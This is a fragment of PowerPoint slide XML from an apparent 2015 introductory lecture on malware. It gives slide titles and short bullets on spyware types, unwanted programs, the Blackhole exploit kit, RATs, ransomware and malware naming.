        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772400" y="2038350"/>
            <a:ext cx="1041400" cy="1270000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772400" y="1047750"/>
            <a:ext cx="990600" cy="895350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="1047750"/>
            <a:ext cx="1257300" cy="1436914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Screen Shot 2015-01-06 at 7.01.2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3562350"/>
            <a:ext cx="4826000" cy="774700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="971550"/>
            <a:ext cx="1383494" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137666383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z="3200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Types of Spyware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" i="1">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1200151"/>
            <a:ext cx="7620000" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Advertising Programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Display pop-up Ads based on tracking the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>s browsing behavior. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Stealware and Affiliate Frauds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Diverts the revenue generated when a user clicks an online Ad owned by the spyware vendor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Identity Theft and Fraud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Steals chat sessions, user names, and passwords, etc. Some spyware also set a computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>s modem to dial out to a premium-rate phone number instead of the ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>s phone number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Tracking Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Some websites place </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> in computers that track the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>s browsing behavior.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200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Other Unwanted Programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1200151"/>
            <a:ext cx="7620000" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The following examples are problems that other unwanted programs can lead to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Annoyance and Jokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Password Crackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Key Loggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Virus, Worm, or Trojan Simulators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Tools that circumvent security measures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Hacker tools like Sniffers, Port Scanners, Vulnerability Scanners, etc., are considered to be Potentially Unwanted </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Though some of the programs may have a valid purpose, they may also cause direct or indirect damage to a computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>s security user privacy and intellectual property.</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Exploit Kits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wednesday, January 7, 15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="819021"/>
            <a:ext cx="9067800" cy="4312738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4907171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exploit Kits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wednesday, January 7, 15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2015-01-03 at 3.49.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1" y="810039"/>
            <a:ext cx="3337709" cy="4324350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-01-03 at 3.51.1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819150"/>
            <a:ext cx="2895600" cy="4324350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2015-01-03 at 3.51.2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399" y="819150"/>
            <a:ext cx="2927459" cy="4324350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353099075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71550"/>
            <a:ext cx="6362700" cy="3679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990600" y="209550"/>
            <a:ext cx="6858000" cy="742950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" kern="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Blackhole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> Exploit Kit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" kern="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257859439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http://labs.m86security.com/wp-content/uploads/2011/12/blackhole12.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="1143000"/>
            <a:ext cx="6002614" cy="3678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itle 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="209550"/>
            <a:ext cx="6858000" cy="742950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Black-hole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302126088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RATs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wednesday, January 7, 15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="895350"/>
            <a:ext cx="5503941" cy="2609850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="24754" y="1543684"/>
            <a:ext cx="9144000" cy="3599816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368582242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Ransom-ware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wednesday, January 7, 15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="819150"/>
            <a:ext cx="4908645" cy="3962400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82981088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Ransom-ware – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bitcoin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> payment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wednesday, January 7, 15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="CL_BitcoinStream.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399" y="819150"/>
            <a:ext cx="5813359" cy="4324350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367959600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 malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wednesday, January 7, 15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="895350"/>
            <a:ext cx="8382000" cy="3845058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209592023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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basics of Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56872999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 malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wednesday, January 7, 15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="971550"/>
            <a:ext cx="5230645" cy="3827832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44370615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Naming convention</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="MMPC naming format as it applies to a Reveton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135" y="973329"/>
            <a:ext cx="6516065" cy="2589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35640" y="861596"/>
            <a:ext cx="8572499" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
